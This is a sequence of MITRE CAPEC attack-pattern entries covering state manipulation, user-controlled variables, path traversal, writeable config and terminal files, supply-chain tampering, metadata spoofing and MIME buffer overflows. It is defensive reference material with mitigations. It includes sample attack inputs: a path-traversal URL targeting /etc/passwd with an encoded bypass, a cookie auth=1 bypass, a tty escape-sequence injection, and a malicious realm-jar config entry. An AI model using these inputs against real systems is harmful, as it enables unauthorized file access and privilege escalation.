Archangel Weblog 0.90.02 allows remote attackers to bypass authentication by setting the ba_admin cookie to 1. See also: CVE-2006-0944

Related Weaknesses

CWE-ID	Weakness Name
353	Missing Support for Integrity Check
285	Improper Authorization
302	Authentication Bypass by Assumed-Immutable Data
472	External Control of Assumed-Immutable Web Parameter
565	Reliance on Cookies without Validation and Integrity Checking
315	Cleartext Storage of Sensitive Information in a Cookie
539	Use of Persistent Cookies Containing Sensitive Information
384	Session Fixation
233	Improper Handling of Parameters

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Example_Instances

CAPEC-74: Manipulating State

Attack Pattern ID: 74

Abstraction: Meta

View customized information:

Description

State management is an important function within a software application. User state maintained by the application can include usernames, payment information, browsing history as well as application-specific contents such as items in a shopping cart. Manipulating user state can be employed by an adversary to elevate privilege, conduct fraudulent transactions or otherwise modify the flow of the application to derive certain benefits.

If there is a hardware logic error in a finite state machine, the adversary can use this to put the system in an undefined state which could cause a denial of service or exposure of secure data.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	140	Bypassing of Intermediate Forms in Multiple-Form Sets
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	663	Exploitation of Transient Instruction Execution

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Manipulate Timing and State

Execution Flow

Explore

Adversary determines the nature of state management employed by the target. This includes determining the location (client-side, server-side or both applications) and possibly the items stored as part of user state.

Experiment

The adversary now tries to modify the user state contents (possibly indiscriminately if the contents are encrypted or otherwise obfuscated) or cause a state transition and observe the effects of this change on the target.

Exploit

Having determined how to manipulate the state, the adversary can perform illegitimate actions.

Prerequisites

User state is maintained at least in some way in user-controllable locations, such as cookies or URL parameters.

There is a faulty finite state machine in the hardware logic that can be exploited.

Skills Required

[Level: Medium]

The adversary needs to have knowledge of state management as employed by the target application, and also the ability to manipulate the state in a meaningful way.

Resources Required

The adversary needs a data tampering tool capable of generating and creating custom inputs to aid in the attack, like Fiddler, Wireshark, or a similar in-browser plugin (e.g., Tamper Data for Firefox).

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges
Integrity	Modify Data
Availability	Unreliable Execution

Mitigations

Do not rely solely on user-controllable locations, such as cookies or URL parameters, to maintain user state.

Avoid sensitive information, such as usernames or authentication and authorization information, in user-controllable locations.

Sensitive information that is part of the user state must be appropriately protected to ensure confidentiality and integrity at each request.

All possible states must be handled by hardware finite state machines.

Example Instances

During the authentication process, an application stores the authentication decision (auth=0/1) in unencrypted cookies. At every request, this cookie is checked to permit or deny a request.

An adversary can easily violate this representation of user state and set auth=1 at every request in order to gain illegitimate access and elevated privilege in the application.

Related Weaknesses

CWE-ID	Weakness Name
372	Incomplete Internal State Distinction
315	Cleartext Storage of Sensitive Information in a Cookie
353	Missing Support for Integrity Check
693	Protection Mechanism Failure
1245	Improper Finite State Machines (FSMs) in Hardware Logic
1253	Incorrect Selection of Fuse Values
1265	Unintended Reentrant Invocation of Non-reentrant Code Via Nested Calls
1271	Uninitialized Value on Reset for Registers Holding Security Settings

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Description Summary, Related_Attack_Patterns
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Probing_Techniques, Resources_Required, Solutions_and_Mitigations
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated @Name, Consequences, Description, Execution_Flow, Mitigations, Prerequisites, Related_Weaknesses
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Execution_Flow, Related_Weaknesses
Previous Entry Names
Change Date	Previous Entry Name
2020-07-30 (Version 3.3)	Manipulating User State

CAPEC-77: Manipulating User-Controlled Variables

Attack Pattern ID: 77

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	22	Exploiting Trust in Client
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	13	Subverting Environment Variable Values
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	162	Manipulating Hidden Fields

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Probe target application: The adversary first probes the target application to determine important information about the target. This information could include types software used, software versions, what user input the application consumes, and so on.

Experiment

Find user-controlled variables: Using the information found by probing the application, the adversary attempts to manipulate many user-controlled variables and observes the effects on the application. If the adversary notices any significant changes to the application, they will know that a certain variable is useful to the application.

Techniques
Adversaries will try to alter many common variable names such as "count", "tempFile", "i", etc. The hope is that they can alter the flow of the application without knowing the inner-workings.
Adversaries will try to alter known environment variables.

Exploit

Manipulate user-controlled variables: Once the adversary has found a user-controller variable(s) that is important to the application, they will manipulate it to change the normal behavior in a way that benefits the adversary.

Prerequisites

A variable consumed by the application server is exposed to the client.

A variable consumed by the application server can be overwritten by the user.

The application server trusts user supplied data to compute business logic.

The application server does not perform proper input validation.

Skills Required

[Level: Low]

The malicious user can easily try some well-known global variables and find one which matches.

[Level: Medium]

The adversary can use automated tools to probe for variables that they can control.

Indicators

A web penetration tool probing a web server may generate abnormal activities recorded on log files. Abnormal traffic such as a high number of request coming from the same client may also rise the warnings from a monitoring system or an intrusion detection tool.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality	Read Data
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Do not allow override of global variables and do Not Trust Global Variables.

If the register_globals option is enabled, PHP will create global variables for each GET, POST, and cookie variable included in the HTTP request. This means that a malicious user may be able to set variables unexpectedly. For instance make sure that the server setting for PHP does not expose global variables.

A software system should be reluctant to trust variables that have been initialized outside of its trust boundary. Ensure adequate checking is performed when relying on input from outside a trust boundary.

Separate the presentation layer and the business logic layer. Variables at the business logic layer should not be exposed at the presentation layer. This is to prevent computation of business logic from user controlled input data.

Use encapsulation when declaring your variables. This is to lower the exposure of your variables.

Example Instances

PHP is a study in bad security. The main idea pervading PHP is "ease of use," and the mantra "don't make the developer go to any extra work to get stuff done" applies in all cases. This is accomplished in PHP by removing formalism from the language, allowing declaration of variables on first use, initializing everything with preset values, and taking every meaningful variable from a transaction and making it available. In cases of collision with something more technical, the simple almost always dominates in PHP.

One consequence of all this is that PHP allows users of a Web application to override environment variables with user-supplied, untrusted query variables. Thus, critical values such as the CWD and the search path can be overwritten and directly controlled by a remote anonymous user.

Another similar consequence is that variables can be directly controlled and assigned from the user-controlled values supplied in GET and POST request fields. So seemingly normal code like this, does bizarre things:

while($count < 10){
// Do something
$count++;
}

Normally, this loop will execute its body ten times. The first iteration will be an undefined zero, and further trips though the loop will result in an increment of the variable $count. The problem is that the coder does not initialize the variable to zero before entering the loop. This is fine because PHP initializes the variable on declaration. The result is code that seems to function, regardless of badness. The problem is that a user of the Web application can supply a request such as

GET /login.php?count=9

and cause $count to start out at the value 9, resulting in only one trip through the loop. Yerg.

Depending on the configuration, PHP may accept user-supplied variables in place of environment variables. PHP initializes global variables for all process environment variables, such as $PATH and $HOSTNAME. These variables are of critical importance because they may be used in file or network operations. If an adversary can supply a new $PATH variable (such as PATH='/var'), the program may be exploitable.

PHP may also take field tags supplied in GET/POST requests and transform them into global variables. This is the case with the $count variable we explored in our previous example.

Consider another example of this problem in which a program defines a variable called $tempfile. An adversary can supply a new temp file such as $tempfile = "/etc/passwd". Then the temp file may get erased later via a call to unlink($tempfile);. Now the passwd file has been erased--a bad thing indeed on most OSs.

Also consider that the use of include() and require() first search $PATH, and that using calls to the shell may execute crucial programs such as ls. In this way, ls may be "Trojaned" (the adversary can modify $PATH to cause a Trojan copy of ls to be loaded). This type of attack could also apply to loadable libraries if $LD_LIBRARY_PATH is modified.

Finally, some versions of PHP may pass user data to syslog as a format string, thus exposing the application to a format string buffer overflow.

See also: File upload allows arbitrary file read by setting hidden form variables to match internal variable names (CVE-2000-0860)

Related Weaknesses

CWE-ID	Weakness Name
15	External Control of System or Configuration Setting
94	Improper Control of Generation of Code ('Code Injection')
96	Improper Neutralization of Directives in Statically Saved Code ('Static Code Injection')
285	Improper Authorization
302	Authentication Bypass by Assumed-Immutable Data
473	PHP External Variable Modification
1321	Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

[REF-520] Artur Maj. "Securing PHP: Step-by-Step". Security Focus. 2003-06-22. <http://www.securityfocus.com/infocus/1706>.

[REF-521] Clancy Malcolm. "Ten Security Checks for PHP, Part 1". 2003-03-20.

[REF-522] "PHP Manual". Chapter 29. Using Register Globals. The PHP Group. <http://www.php.net/manual/en/security.globals.php>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow, Mitigations, Skills_Required
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Weaknesses
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Example_Instances, Execution_Flow, Skills_Required
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-76: Manipulating Web Input to File System Calls

Attack Pattern ID: 76

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	126	Path Traversal

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Execution Flow

Explore

Fingerprinting of the operating system: In order to create a valid file injection, the attacker needs to know what the underlying OS is so that the proper file seperator is used.

Techniques
Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
Induce errors to find informative error messages

Survey the Application to Identify User-controllable Inputs: The attacker surveys the target application to identify all user-controllable inputs, possibly as a valid and authenticated user
Techniques
Spider web sites for all available links, entry points to the web site.
Manually explore application and inventory all application inputs

Experiment

Vary inputs, looking for malicious results: Depending on whether the application being exploited is a remote or local one, the attacker crafts the appropriate malicious input containing the path of the targeted file or other file system control syntax to be passed to the application

Techniques
Inject context-appropriate malicious file path using network packet injection tools (netcat, nemesis, etc.)
Inject context-appropriate malicious file path using web test frameworks (proxies, TamperData, custom programs, etc.) or simple HTTP requests
Inject context-appropriate malicious file system control syntax

Exploit

Manipulate files accessible by the application: The attacker may steal information or directly manipulate files (delete, copy, flush, etc.)

Techniques
The attacker injects context-appropriate malicious file path to access the content of the targeted file.
The attacker injects context-appropriate malicious file system control syntax to access the content of the targeted file.
The attacker injects context-appropriate malicious file path to cause the application to create, delete a targeted file.
The attacker injects context-appropriate malicious file system control syntax to cause the application to create, delete a targeted file.
The attacker injects context-appropriate malicious file path in order to manipulate the meta-data of the targeted file.
The attacker injects context-appropriate malicious file system control syntax in order to manipulate the meta-data of the targeted file.

Prerequisites

Program must allow for user controlled variables to be applied directly to the filesystem

Skills Required

[Level: Low]

To identify file system entry point and execute against an over-privileged system interface

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges
Integrity	Modify Data

Mitigations

Design: Enforce principle of least privilege.

Design: Ensure all input is validated, and does not contain file system commands

Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.

Design: For interactive user applications, consider if direct file system interface is necessary, instead consider having the application proxy communication.

Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables.

Example Instances

The attacker uses relative path traversal to access files in the application. This is an example of accessing user's password file.

http://www.example.com/getProfile.jsp?filename=../../../../etc/passwd

However, the target application employs regular expressions to make sure no relative path sequences are being passed through the application to the web page. The application would replace all matches from this regex with the empty string.

Then an attacker creates special payloads to bypass this filter:

http://www.example.com/getProfile.jsp?filename=%2e%2e/%2e%2e/%2e%2e/%2e%2e /etc/passwd

When the application gets this input string, it will be the desired vector by the attacker.

Related Weaknesses

CWE-ID	Weakness Name
23	Relative Path Traversal
22	Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
73	External Control of File Name or Path
77	Improper Neutralization of Special Elements used in a Command ('Command Injection')
346	Origin Validation Error
348	Use of Less Trusted Source
285	Improper Authorization
272	Least Privilege Violation
59	Improper Link Resolution Before File Access ('Link Following')
74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
15	External Control of System or Configuration Setting

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Examples-Instances, Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances
Previous Entry Names
Change Date	Previous Entry Name
2017-01-09 (Version 2.9)	Manipulating Input to File System Calls

CAPEC-75: Manipulating Writeable Configuration Files

Attack Pattern ID: 75

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	176	Configuration/Environment Manipulation
PeerOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	35	Leverage Executable Code in Non-Executable Files

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources

Prerequisites

Configuration files must be modifiable by the attacker

Skills Required

[Level: Medium]

To identify vulnerable configuration files, and understand how to manipulate servers and erase forensic evidence

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Design: Enforce principle of least privilege

Design: Backup copies of all configuration files

Implementation: Integrity monitoring for configuration files

Implementation: Enforce audit logging on code and configuration promotion procedures.

Implementation: Load configuration from separate process and memory space, for example a separate physical device like a CD

Example Instances

The BEA Weblogic server uses a config.xml file to store configuration data. If this file is not properly protected by the system access control, an attacker can write configuration information to redirect server output through system logs, database connections, malicious URLs and so on. Access to the Weblogic server may be from a so-called Custom realm which manages authentication and authorization privileges on behalf of user principals. Given write access, the attacker can insert a pointer to a custom realm jar file in the config.xml

< CustomRealm

ConfigurationData="java.util.Properties"
Name="CustomRealm"
RealmClassName="Maliciousrealm.jar"
/>

The main issue with configuration files is that the attacker can leverage all the same functionality the server has, but for malicious means. Given the complexity of server configuration, these changes may be very hard for administrators to detect.

Related Weaknesses

CWE-ID	Weakness Name
349	Acceptance of Extraneous Untrusted Data With Trusted Data
99	Improper Control of Resource Identifiers ('Resource Injection')
77	Improper Neutralization of Special Elements used in a Command ('Command Injection')
346	Origin Validation Error
353	Missing Support for Integrity Check
354	Improper Validation of Integrity Check Value

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-40: Manipulating Writeable Terminal Devices

Attack Pattern ID: 40

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	248	Command Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Identify attacker-writable terminals: Determine if users TTYs are writable by the attacker.

Techniques
Determine the permissions for the TTYs found on the system. Any that allow user write to the TTY may be vulnerable.
Attempt to write to other user TTYs. This approach could leave a trail or alert a user.

Exploit

Execute malicious commands: Using one or more vulnerable TTY, execute commands to achieve various impacts.
Techniques
Commands that allow reading or writing end user files can be executed.

Prerequisites

User terminals must have a permissive access control such as world writeable that allows normal users to control data on other user's terminals.

Skills Required

[Level: Low]

Ability to discover permissions on terminal devices. Of course, brute force can also be used.

Resources Required

Access to a terminal on the target network

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges
Confidentiality	Read Data
Confidentiality Integrity Availability	Execute Unauthorized Commands

Mitigations

Design: Ensure that terminals are only writeable by named owner user and/or administrator

Design: Enforce principle of least privilege

Example Instances

"Any system that allows other peers to write directly to its terminal process is vulnerable to this type of attack. If the terminals are available through being over-privileged (i.e. world-writable) or the attacker is an administrator, then a series of commands in this format can be used to echo commands out to victim terminals.

"$echo -e "\033[30m\033\132" > /dev/ttyXX

where XX is the tty number of the user under attack. This will paste the characters to another terminal (tty). Note this technique works only if the victim's tty is world writable (which it may not be). That is one reason why programs like write(1) and talk(1) in UNIX systems need to run setuid." [REF-1]

If the victim continues to hit "enter" and execute the commands, there are an endless supply of vectors available to the attacker, copying files, open up network connections, ftp out to servers, and so on.

Related Weaknesses

CWE-ID	Weakness Name
77	Improper Neutralization of Special Elements used in a Command ('Command Injection')

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Phases, Description, Description Summary, Related_Vulnerabilities
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attacker_Skills_or_Knowledge_Required, Related_Attack_Patterns, Type (Attack_Pattern -> Relationship)
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Example_Instances
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-439: Manipulation During Distribution

Attack Pattern ID: 439

Abstraction: Meta

View customized information:

Description

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	522	Malicious Hardware Component Replacement
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	523	Malicious Software Implanted
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	524	Rogue Integration Procedures

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware, Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Distribution

Example Instances

A malicious OEM provider, or OEM provider employee or contractor, may install software, or modify existing code, during distribution.

External contractors involved in the packaging or testing of products or components may install software, or modify existing code, during distribution.

Related Weaknesses

CWE-ID	Weakness Name
1269	Product Released in Non-Release Configuration

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1195	Supply Chain Compromise

References

[REF-384] SAFECode. "The Software Supply Chain Integrity Framework Defining Risks and Responsibilities for Securing Software in the Global Supply Chain". Safecode.org. 2009.

[REF-382] Marianne Swanson, Nadya Bartol and Rama Moorthy. "Piloting Supply Chain Risk Management Practices for Federal Information Systems". Section 1. Introduction. Draft NISTIR 7622. National Institute of Standards and Technology. 2010.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Taxonomy_Mappings
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Weaknesses, Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
Previous Entry Names
Change Date	Previous Entry Name
2015-11-09 (Version 2.7)	Integrity Modification During Distribution

CAPEC-690: Metadata Spoofing

Attack Pattern ID: 690

Abstraction: Meta

View customized information:

Description

An adversary alters the metadata of a resource (e.g., file, directory, repository, etc.) to present a malicious resource as legitimate/credible.

Extended Description

One approach to this attack entails the adversary altering a maliciously modified resource's metadata in order to hide their malicious activity. Another approach involves altering the metadata of an adversary-created resource to make the source appear more credible. Adversaries may spoof a variety of metadata across a number of resources, such as the following:

Authors of Version Control System (VCS) repository commits
Open source package statistics
File attributes, such as when a file was last update

The ultimate goal of a Metadata Spoofing attack is to trick victims into believing the malicious resource being provided originates from a reputable source. However, the victim instead leverages the malicious resource, which could result in a number of negative technical impacts.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	691	Spoof Open-Source Software Metadata

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Supply Chain, Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions
Supply Chain Risks	Development and Production, Sustainment

Prerequisites

Identification of a resource whose metadata is to be spoofed

Skills Required

[Level: Medium]

Ability to spoof a variety of metadata to convince victims the source is trusted

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Accountability	Hide Activities
Access Control Authorization	Execute Unauthorized Commands

Mitigations

Validate metadata of resources such as authors, timestamps, and statistics.

Confirm the pedigree of open source packages and ensure the code being downloaded does not originate from another source.

Even if the metadata is properly checked and a user believes it to be legitimate, there may still be a chance that they've been duped. Therefore, leverage automated testing techniques to determine where malicious areas of the code may exist.

Related Weaknesses

Content History

Submissions
Submission Date	Submitter	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)

CAPEC-42: MIME Conversion

Attack Pattern ID: 42

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	100	Overflow Buffers

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Execution Flow

Explore

Identify target mail server: The adversary identifies a target mail server that they wish to attack.
Techniques
Use Nmap on a system to identify a mail server service.
Determine viability of attack: Determine whether the mail server is unpatched and is potentially vulnerable to one of the known MIME conversion buffer overflows (e.g. Sendmail 8.8.3 and 8.8.4).

Experiment

Find injection vector: Identify places in the system where vulnerable MIME conversion routines may be used.

Craft overflow content: The adversary crafts e-mail messages with special headers that will cause a buffer overflow for the vulnerable MIME conversion routine. The intent of this attack is to leverage the overflow for execution of arbitrary code and gain access to the mail server machine, so the adversary will craft an email that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversary's choosing.

Techniques
Create malicious shellcode that will execute when the program execution is returned to it.
Use a NOP-sled in the overflow content to more easily "slide" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

Overflow the buffer: Send e-mail messages to the target system with specially crafted headers that trigger the buffer overflow and execute the shell code.

Prerequisites

The target system uses a mail server.

